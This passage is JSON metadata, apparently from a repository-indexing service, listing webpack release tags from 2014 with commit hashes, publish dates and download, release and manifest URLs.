"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"}